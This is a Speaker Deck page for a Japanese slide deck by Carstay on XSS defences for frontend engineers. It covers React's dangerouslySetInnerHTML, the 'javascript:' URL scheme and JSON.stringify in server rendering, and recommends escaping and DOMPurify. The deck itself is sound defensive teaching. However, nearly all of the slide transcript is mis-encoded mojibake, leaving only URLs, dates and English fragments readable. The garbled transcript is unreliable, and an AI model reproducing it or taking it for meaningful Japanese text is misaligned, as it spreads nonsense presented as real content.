Upgrade to Pro — share decks privately, control downloads, hide ads and more …

フロントエンドエンジニアのためのセキュリティ対策

1c7c5f4254748d5e3da9a1095e42d85c?s=47 CarstayJP
February 26, 2022

 フロントエンドエンジニアのためのセキュリティ対策

1c7c5f4254748d5e3da9a1095e42d85c?s=128

CarstayJP

February 26, 2022
Tweet

More Decks by CarstayJP

Other Decks in Technology

Transcript

  1. ϑϩϯτΤϯυΤϯδχΞ΋஌ ͓͖͍ͬͯͨηΩϡϦςΟରࡦ XSSฤ 2022/02/26

  2. Carstayגࣜձࣾɿ֓ཁ 2

  3. Carstayגࣜձࣾɿϛογϣϯ 3 Stay Anywhere, Anytime. ୭΋͕޷͖ͳͱ͖ʹɺ޷͖ͳ৔ॴͰɺ޷͖ͳਓͱաͤ͝ΔੈքΛͭ͘Δ

  4. CarstayגࣜձࣾɿϓϩμΫτ 4 ʮCarstayʯ͸೔ຊͰ།ҰɺΩϟϯϐϯάΧʔͱंதധεϙοτΛ༧໿͢Δ͜ͱ͕Ͱ͖ΔεϚϗΞϓϦͰ͢ ৐Βͳ͍ظؒʹ༡ٳं྆ΛγΣΞ͍ͨ͠Φʔφʔɺۭ͖஍Λ༗ޮ׆༻͍ͨ͠றं৔Φʔφʔ͕ొ࿥͍ͯ͠·͢

  5. ࣗݾ঺հ Ngo Van Thang | ϑϧελοΫΤϯδχΞ ▼ ܦྺ ɾ2014೥ʹଔۀޙʹདྷ೔ ɾ2014೥

    ιʔγϟϧήʔϜӡӦձࣾʹೖࣾ ɹɾήʔϜαʔόӡ༻ ɾ2016೥ ೿ݣձࣾʹೖࣾ ɹɾίʔσΟϯάςεταʔϏεɺLINE഑৴αʔϏε։ൃ ɾ2018೥ ϒϩοΫνΣʔϯձࣾʹೖࣾ ɹɾϒϩοΫνΣʔϯΛ࢖ͬͨΫϦΤʔλͱاۀͷϚονϯάαʔϏεɺӽڥEC։ൃ ɾ2020೥ Carstayגࣜձࣾʹೖࣾ | Tech Lead ɹɾ։ൃશൠ؅ཧɺίʔυϨϏϡʔɺ΢ΣϒɾΞϓϦ։ൃ ▼झຯ ɾήʔϜʢΞΫγϣϯήʔϜɺFPS etcʣ ɾαοΧʔ ɾίϚϯυϥΠϯ͕޷͖ Ngo Van Thangʢ30ࡀʣ @nooptr https://www.facebook.com/thanghedspi 5
  6. Agenda • ੬ऑੑ(XSS)ͷ࢓૊Έͱରࡦ • σϞ • ·ͱΊ 6

  7. ΢ΣϒαΠτͷ੬ऑੑͷछྨผʢ೥ʣ 7 11% 2% 2% 3% 11% 13% 58% https://www.ipa.go.jp/files/000082044.pdf

    XSS ʢΫϩεαΠτɾεΫϦϓςΟϯά ʣ DNS৘ใͷઃఆෆඋ SQLΠϯδΣΫγϣϯ ϑΝΠϧͷޡͬͨެ։ σΟϨΫτϦɾτϥόʔαϧ HTTPSͷෆద੾ͳར༻ ͦͷଞ
  8. XSS ΫϩεαΠτɾεΫϦϓςΟϯά

  9. XSSʢΫϩεαΠτεΫϦϓςΟϯάʣͱ͸ ར༻ऀ͕ೖྗͨ͠಺༰Λදࣔ͢ΔΑ͏ͳߏ੒ͷWebαΠτʹଘࡏ͢Δܽ ؕΛѱ༻ͯ͠ɺ߈ܸऀ͕༻ҙͨ͠ѱҙͷ͋ΔεΫϦϓτΛར༻ऀͷݩʹ ૹΓࠐΜͰ࣮ߦͤ͞Δ߈ܸख๏ɻ 9

  10. XSSͷ࢓૊Έ 10 Source: https://yamory.io/blog/about-xss/

  11. ReactͷXSS

  12. dangerouslySetInnerHTML 12 ▪ dangerouslySetInnerHTMLͱ͸ ɾReactެࣜͷΤεέʔϓΛແޮԽ͢ΔΦϓγϣϯ ɾHTMLͱͯ͠ೝ͍ࣝͤͨ͞৔߹ͳͲʹར༻͢Δ

  13. dangerouslySetInnerHTML 13 ▪ dangerouslySetInnerHTMLͱ͸ ɾReactެࣜͷΤεέʔϓΛແޮԽ͢ΔΦϓγϣϯ ɾHTMLͱͯ͠ೝ͍ࣝͤͨ͞৔߹ͳͲʹར༻͢Δ DEMO: https://codesandbox.io/s/react-xss-example-forked-9n3exm

  14. dangerouslySetInnerHTML 14 ▪ରࡦɿ 
 ɾ࢖Θͳ͍ɻͲ͏ͯ͠΋ར༻͍ͨ͠৔߹͸ɺపఈతʹΤεέʔϓΛߦ͏ɻ ɾdompurifyͳͲͷϥΠϒϥϦΛ࢖͏͜ͱͰɺXSSͷ໰୊ΛղܾͰ͖Δɻ https://github.com/cure53/DOMPurify

  15. hrefଐੑ͸ɺઌ಄͕javascript:͔Β࢝·Δ৔߹͸ͦΕҎ߱ͷจࣈྻΛ javascriptͱ࣮ͯ͠ߦ͞ΕΔ Javascript: εΩʔϜ 15

  16. hrefଐੑ͸ɺઌ಄͕javascript:͔Β࢝·Δ৔߹͸ͦΕҎ߱ͷจࣈྻΛ javascriptͱ࣮ͯ͠ߦ͞ΕΔ Javascript: εΩʔϜ 16 DEMO: https://codesandbox.io/s/react-xss-example-forked-g8hs86

  17. ▪ରࡦɿ ɾεΩʔϜΛhttp:// ͔ https://ͷΈʹ੍ޚ͢Δ ɾઌ಄ʹ / Λ͚ͭΔ Javascript: εΩʔϜ 17

    DEMO: https://codesandbox.io/s/react-xss-example-forked-g8hs86
  18. JSON.stringify(str) 18 ੬ऑ෦෼ ҎԼͷ஋ؚ͕·ΕΔͱɺXSS͕ੜ͡Δ Server Renderingͷ࣌ʹɺReactଆͰ࢖͑ΔΑ͏ʹɺԼهͷΑ͏ͳίʔυ͕͋Δ

  19. 19 ID/ύεϫʔυ͕࿙Εͳ͔ͬͨΒຊ౰ʹେৎ෉ʁ

  20. 20 ͦΜͳ͜ͱͳ͍Ͱ͢Α

  21. 21 DEMO

  22. ·ͱΊ

  23. ·ͱΊ 23 ɾ࠷΋ଟ͍੬ऑੑ͸XSS ɾXSSରࡦʹ͸จࣈྻΛΤεέʔϓ͢Δ ɾXSSͷݪཧΛ஌Βͳ͍ͱɺ؆୯ʹXSSͷ੬ऑੑΛ࡞ΓࠐΜͰ͠·͏ͷͰɺXSSͷཧղ͸ඞཁ ɾID/ύεϫʔυΛ஌Βͳͯ͘΋ɺCookie৘ใ͕Θ͔ͬͨΒɺϩάΠϯͰ͖ͯ͠·͏ͷͰɺ PC࢖Θͳ͍࣌͸ඞͣը໘ΛϩοΫ͠·͠ΐ͏

  24. CarstayɺઈࢍΤϯδχΞืूதͰ͢ʂ 24 ˒ CTOީิΤϯδχΞ ɾϑϩϯτΤϯυΤϯδχΞ ɾΞϓϦΤϯδχΞ ɾαʔόʔαΠυΤϯδχΞ ։ൃݴޠɿTypescriptɹ։ൃϑϨʔϜϫʔΫɿReactJS, React NativeɹWebαʔόɿNodeJS

    ͥͻ͓ؾܰʹ͝࿈བྷ͍ͩ͘͞ ⏬
  25. 25 ͝੩ௌ͋Γ͕ͱ͏͍͟͝·ͨ͠ʂ